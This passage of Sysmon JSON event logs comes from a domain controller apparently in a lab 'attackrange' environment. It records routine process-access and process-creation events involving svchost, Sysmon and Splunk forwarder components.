C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3822,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3823,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3824,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3825,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3826,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3827,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:41.942\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFD-5F25-0000-0010BECF0500}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:41.942","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFD-5F25-0000-0010BECF0500}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3828,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.615\r\nProcessGuid: {41C8662E-1FFE-5F25-0000-001076D10500}\r\nProcessId: 4476\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Performance monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-perfmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.615","ProcessGuid":"{41C8662E-1FFE-5F25-0000-001076D10500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","FileVersion":"8.0.2","Description":"Performance monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-perfmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3829,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFE-5F25-0000-001076D10500}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFE-5F25-0000-001076D10500}","TargetProcessId":"4476","TargetImage":"C:\\Program 